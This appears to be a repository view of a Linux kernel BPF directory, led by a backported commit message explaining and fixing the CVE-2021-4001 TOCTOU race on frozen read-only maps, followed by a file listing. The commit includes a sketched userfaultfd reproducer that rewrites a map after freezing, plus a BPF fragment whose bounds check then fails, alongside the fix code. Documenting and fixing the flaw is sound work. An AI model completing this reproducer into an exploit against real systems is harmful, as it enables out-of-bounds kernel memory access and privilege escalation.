kernel_optimize_test/kernel/bpf
Daniel Borkmann 33fe044f6a bpf: Fix toctou on read-only map's constant scalar tracking
commit 353050be4c19e102178ccc05988101887c25ae53 upstream.

Commit a23740ec43 ("bpf: Track contents of read-only maps as scalars") checks
whether maps are read-only from both the BPF program side and the user space
side, and then, given their content is constant, reads out their data via
map->ops->map_direct_value_addr(). That data is subsequently used as a known
scalar value for the register, that is, the register is marked via
__mark_reg_known() with the value read at verification time. Before a23740ec43,
the register content was marked as an unknown scalar, so the verifier could not
make any assumptions about the map content.
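
As a rough sketch, the check_mem_access() hunk that a23740ec43 added in
kernel/bpf/verifier.c has approximately the following shape (details may
differ between kernel versions); it handles a BPF_READ through a
PTR_TO_MAP_VALUE register with a constant offset:

  if (tnum_is_const(reg->var_off) &&
      bpf_map_is_rdonly(map) &&
      map->ops->map_direct_value_addr) {
          int map_off = off + reg->var_off.value;
          u64 val = 0;

          /* read the constant directly out of the map at verification time */
          err = bpf_map_direct_read(map, map_off, size, &val);
          if (err)
                  return err;

          regs[value_regno].type = SCALAR_VALUE;
          __mark_reg_known(&regs[value_regno], val);
  } else {
          /* not provably constant: keep it an unknown scalar */
          mark_reg_unknown(env, regs, value_regno);
  }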

The current implementation, however, is prone to a TOCTOU race: the value read
as a known scalar for the register is not guaranteed to be exactly the same at
a later point when the program is executed, and as such the assumptions the
verifier made about the program earlier become invalid, which can cause issues
such as OOB access, etc.
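
To make the consequence concrete, here is a hypothetical BPF-C fragment (not
taken from the commit; the program name, the socket filter section and the use
of skb->len as index are made up for illustration) where the verifier's
constant assumption is exactly what makes the access "safe":

  #include <linux/bpf.h>
  #include <bpf/bpf_helpers.h>

  const volatile __u32 limit = 4;  /* ends up in the frozen .rodata map */
  char buf[64];                    /* ends up in the writable .bss map */

  SEC("socket")
  int rdonly_scalar_demo(struct __sk_buff *skb)
  {
          __u32 i = skb->len;      /* runtime-controlled index */

          /* The verifier folds 'limit' to the constant 4, bounds i to
           * [0, 3] and proves buf[i] in-bounds without any runtime check.
           * If the map content behind 'limit' changes after verification,
           * the very same load can reach far outside of buf.
           */
          if (i < limit)
                  return buf[i];
          return 0;
  }

  char _license[] SEC("license") = "GPL";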

While the BPF_F_RDONLY_PROG map flag is always fixed and required to be
specified at map creation time, the map->frozen property is initially set to
false for the map, given the map value needs to be populated, e.g. for global
data sections. Once populated, the loader "freezes" the map from user space
such that no subsequent updates/deletes are possible anymore. For the rest of
the map's lifetime, this one-time freeze cannot be undone after a successful
BPF_MAP_FREEZE cmd return: any new BPF_* cmd calls which would update/delete
map entries will be rejected with -EPERM, since map_get_sys_perms() removes
the FMODE_CAN_WRITE permission. Note, however, that pending update/delete
operations must still complete before this guarantee actually holds. This
corner case is not an issue for loaders since they create and prepare such
program-private maps in successive steps.
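
For reference, the permission downgrade is handled by map_get_sys_perms() in
kernel/bpf/syscall.c, which looks roughly like this (modulo version-specific
details):

  static fmode_t map_get_sys_perms(struct bpf_map *map, struct fd f)
  {
          fmode_t mode = f.file->f_mode;

          /* Our file permissions may have been overridden by global map
           * permissions facing the syscall side: once the map is frozen,
           * write access from user space is gone for good.
           */
          if (READ_ONCE(map->frozen))
                  mode &= ~FMODE_CAN_WRITE;
          return mode;
  }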

However, a malicious user is able to trigger this TOCTOU race in two different
ways: i) via userfaultfd, and ii) via batched updates. For i), userfaultfd is
used to widen the race window so that map_update_elem() can modify the contents
of the map after map_freeze() and bpf_prog_load() have been executed. This
works because userfaultfd halts the parallel thread which triggered a
map_update_elem() at the point where the key/value is copied from the user
buffer; that thread has already passed the FMODE_CAN_WRITE permission check,
given the map was not "frozen" at that time. The main thread then performs
map_freeze() and bpf_prog_load(), and once both have completed successfully,
the other thread is woken up to finish the pending map_update_elem(), which
then changes the map content. For ii), the idea of the batched update is
similar: when there is a large number of updates to process, the race window
between the two parties grows. It is therefore possible in practice to modify
the contents of the map after executing map_freeze() and bpf_prog_load().
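
A rough user space sketch of flavor i), following the sequence described above
(error handling omitted; map_fd is assumed to be an already-created array map
flagged BPF_F_RDONLY_PROG, the names stall_page/updater are illustrative, the
actual bpf_prog_load() step is elided, and libbpf's bpf_map_update_elem() and
bpf_map_freeze() wrappers are assumed):

  #include <fcntl.h>
  #include <pthread.h>
  #include <stdint.h>
  #include <string.h>
  #include <sys/ioctl.h>
  #include <sys/mman.h>
  #include <sys/syscall.h>
  #include <unistd.h>
  #include <linux/userfaultfd.h>
  #include <bpf/bpf.h>

  static int map_fd;        /* array map with BPF_F_RDONLY_PROG, created elsewhere */
  static void *stall_page;  /* value buffer backed by a userfaultfd range */

  static void *updater(void *unused)
  {
          uint32_t key = 0;

          /* Passes the FMODE_CAN_WRITE check (map not frozen yet), then
           * blocks inside the kernel while copying the value from the
           * still-missing userfaultfd page.
           */
          bpf_map_update_elem(map_fd, &key, stall_page, 0);
          return NULL;
  }

  int main(void)
  {
          int uffd = syscall(__NR_userfaultfd, O_CLOEXEC);
          struct uffdio_api api = { .api = UFFD_API };
          struct uffdio_register reg = { 0 };
          struct uffdio_copy copy = { 0 };
          char value[4096];
          pthread_t t;

          ioctl(uffd, UFFDIO_API, &api);

          stall_page = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
          reg.range.start = (unsigned long)stall_page;
          reg.range.len = 4096;
          reg.mode = UFFDIO_REGISTER_MODE_MISSING;
          ioctl(uffd, UFFDIO_REGISTER, &reg);

          pthread_create(&t, NULL, updater, NULL);  /* stalls in map_update_elem() */
          sleep(1);                                 /* crude: let it reach the fault */

          bpf_map_freeze(map_fd);  /* succeeds: nothing tracks the pending write */
          /* ... bpf_prog_load() of a program relying on the "constant" ... */

          /* Resolve the fault: the pending update now completes and rewrites
           * the value the verifier has already folded into the program.
           */
          memset(value, 0x41, sizeof(value));
          copy.dst = (unsigned long)stall_page;
          copy.src = (unsigned long)value;
          copy.len = 4096;
          ioctl(uffd, UFFDIO_COPY, &copy);

          pthread_join(t, NULL);
          return 0;
  }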

One way to fix both i) and ii) at the same time is to expand the use of the
map's map->writecnt. The counter was introduced in fc9702273e ("bpf: Add mmap()
support for BPF_MAP_TYPE_ARRAY") and further refined in 1f6cb19be2 ("bpf:
Prevent re-mmap()'ing BPF map as writable for initially r/o mapping") with the
rationale of making a writable mmap()'ing of a map mutually exclusive with
read-only freezing: the counter tracks writable mmap() mappings and makes the
freeze operation fail while such mappings exist. Its semantics can be expanded
beyond just mmap() to generally indicate ongoing write phases. This then spans
any parallel regular and batched flavor of update/delete operation and likewise
lets map_freeze() fail with -EBUSY while a write is in flight. For
check_mem_access() in the verifier, the bpf_map_is_rdonly() check is extended
to ensure that all pending writes have completed, via a bpf_map_write_active()
test. Only once map->frozen is set and bpf_map_write_active() indicates a
map->writecnt of 0 are we really guaranteed that the map's data can be used as
known constants. If map->frozen is set but pending writes are still in the
process of completing, we fall back to marking the register as an unknown
scalar so we don't end up making assumptions about it. With this, both TOCTOU
reproducers from i) and ii) are fixed.
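
Sketched from the description above (the exact placement differs between
upstream and this backport), the fix boils down to three small pieces: write
phase tracking helpers around map->writecnt in kernel/bpf/syscall.c, an -EBUSY
bail-out in map_freeze(), and a stricter bpf_map_is_rdonly() in
kernel/bpf/verifier.c:

  /* syscall.c: bracket every regular and batched update/delete operation */
  static void bpf_map_write_active_inc(struct bpf_map *map)
  {
          atomic64_inc(&map->writecnt);
  }

  static void bpf_map_write_active_dec(struct bpf_map *map)
  {
          atomic64_dec(&map->writecnt);
  }

  bool bpf_map_write_active(const struct bpf_map *map)
  {
          return atomic64_read(&map->writecnt) != 0;
  }

  /* map_freeze(): refuse to freeze while a write phase is still in flight */
  if (bpf_map_write_active(map)) {
          err = -EBUSY;
          goto err_put;
  }

  /* verifier.c: only treat the map as truly read-only once it is frozen and
   * no write is pending anymore; otherwise check_mem_access() falls back to
   * an unknown scalar.
   */
  static bool bpf_map_is_rdonly(const struct bpf_map *map)
  {
          return (map->map_flags & BPF_F_RDONLY_PROG) &&
                 READ_ONCE(map->frozen) &&
                 !bpf_map_write_active(map);
  }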

Note that map->writecnt has been converted into an atomic64 in the fix in
order to avoid a double freeze_mutex mutex_{un,}lock() pair when updating
map->writecnt in the various map update/delete BPF_* cmd flavors. Spanning the
freeze_mutex over entire map update/delete operations on the syscall side is
not an option, since it would serialize everything. Similarly, something like
synchronize_rcu() after setting map->frozen to wait for update/deletes to
complete is not possible either, since it would also have to span the user
copy, which can sleep. On the libbpf side, this won't break d66562fba1
("libbpf: Add BPF object skeleton support"), as the anonymous mmap()-ed "map
initialization image" is remapped as BPF map-backed mmap()-ed memory, where
for .rodata it's non-writable.
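
As an illustration of why the atomic counter suffices, and matching the
backport note below about the err_put block, the syscall-side update path
simply brackets the whole operation, including the sleepable user copy, with
the counter; roughly:

  static int map_update_elem(union bpf_attr *attr)
  {
          /* ... fdget(), __bpf_map_get() ... */

          bpf_map_write_active_inc(map);          /* write phase begins */
          if (!(map_get_sys_perms(map, f) & FMODE_CAN_WRITE)) {
                  err = -EPERM;
                  goto err_put;
          }

          /* ... copy key/value from user space (this may fault and sleep,
           * e.g. on a userfaultfd-backed page), then perform the update ...
           */
  err_put:
          bpf_map_write_active_dec(map);          /* write phase ends */
          fdput(f);
          return err;
  }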

Fixes: a23740ec43 ("bpf: Track contents of read-only maps as scalars")
Reported-by: w1tcher.bupt@gmail.com
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Acked-by: Andrii Nakryiko <andrii@kernel.org>
Signed-off-by: Alexei Starovoitov <ast@kernel.org>
[fix conflict to call bpf_map_write_active_dec() in err_put block.
fix conflict to insert new functions after find_and_alloc_map().]
Reference: CVE-2021-4001
Signed-off-by: Masami Ichikawa(CIP) <masami.ichikawa@cybertrust.co.jp>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
2021-12-01 09:18:58 +01:00
preload bpf: Fix umd memory leak in copy_process() 2021-03-30 14:32:03 +02:00
arraymap.c bpf: Fix potential race in tail call compatibility check 2021-11-02 19:48:21 +01:00
bpf_inode_storage.c bpf: Change inode_storage's lookup_elem return value from NULL to -EBADF 2021-03-30 14:31:56 +02:00
bpf_iter.c bpf: Fix an unitialized value in bpf_iter 2021-03-04 11:37:33 +01:00
bpf_local_storage.c bpf: Use hlist_add_head_rcu when linking to local_storage 2020-09-19 01:12:35 +02:00
bpf_lru_list.c bpf_lru_list: Read double-checked variable once without lock 2021-03-04 11:37:29 +01:00
bpf_lru_list.h
bpf_lsm.c bpf: Update verification logic for LSM programs 2020-11-06 13:15:21 -08:00
bpf_struct_ops_types.h
bpf_struct_ops.c bpf: Handle return value of BPF_PROG_TYPE_STRUCT_OPS prog 2021-10-06 15:55:50 +02:00
btf.c bpf: Forbid trampoline attach for functions with variable arguments 2021-06-16 12:01:35 +02:00
cgroup.c bpf, cgroup: Fix problematic bounds check 2021-02-10 09:29:12 +01:00
core.c bpf: Prevent increasing bpf_jit_limit above max 2021-11-18 14:03:42 +01:00
cpumap.c bpf, cpumap: Remove rcpu pointer from cpu_map_build_skb signature 2020-09-28 23:30:42 +02:00
devmap.c bpf, devmap: Use GFP_KERNEL for xdp bulk queue allocation 2021-03-04 11:37:33 +01:00
disasm.c bpf: Introduce BPF nospec instruction for mitigating Spectre v4 2021-08-04 12:46:44 +02:00
disasm.h
dispatcher.c
hashtab.c bpf: Fix integer overflow involving bucket_size 2021-08-18 08:59:10 +02:00
helpers.c bpf: Fix potentially incorrect results with bpf_get_local_storage() 2021-09-03 10:09:31 +02:00
inode.c bpf: link: Refuse non-O_RDWR flags in BPF_OBJ_GET 2021-04-14 08:42:00 +02:00
local_storage.c bpf: Fix NULL pointer dereference in bpf_get_local_storage() helper 2021-09-03 10:09:21 +02:00
lpm_trie.c bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
Makefile bpf: Don't rely on GCC __attribute__((optimize)) to disable GCSE 2020-10-29 20:01:46 -07:00
map_in_map.c bpf: Relax max_entries check for most of the inner map types 2020-08-28 15:41:30 +02:00
map_in_map.h bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
map_iter.c bpf: Implement link_query callbacks in map element iterators 2020-08-21 14:01:39 -07:00
net_namespace.c bpf: Add support for forced LINK_DETACH command 2020-08-01 20:38:28 -07:00
offload.c
percpu_freelist.c bpf: Use raw_spin_trylock() for pcpu_freelist_push/pop in NMI 2020-10-06 00:04:11 +02:00
percpu_freelist.h bpf: Use raw_spin_trylock() for pcpu_freelist_push/pop in NMI 2020-10-06 00:04:11 +02:00
prog_iter.c bpf: Refactor bpf_iter_reg to have separate seq_info member 2020-07-25 20:16:32 -07:00
queue_stack_maps.c bpf: Add map_meta_equal map ops 2020-08-28 15:41:30 +02:00
reuseport_array.c bpf, net: Rework cookie generator as per-cpu one 2020-09-30 11:50:35 -07:00
ringbuf.c bpf: Fix false positive kmemleak report in bpf_ringbuf_area_alloc() 2021-07-19 09:44:54 +02:00
stackmap.c bpf: Fix integer overflow in prealloc_elems_and_freelist() 2021-10-13 10:04:26 +02:00
syscall.c bpf: Fix toctou on read-only map's constant scalar tracking 2021-12-01 09:18:58 +01:00
sysfs_btf.c bpf: Fix sysfs export of empty BTF section 2020-09-21 21:50:24 +02:00
task_iter.c bpf: Save correct stopping point in file seq iteration 2021-01-19 18:27:28 +01:00
tnum.c
trampoline.c bpf: Fix fexit trampoline. 2021-04-07 15:00:03 +02:00
verifier.c bpf: Fix toctou on read-only map's constant scalar tracking 2021-12-01 09:18:58 +01:00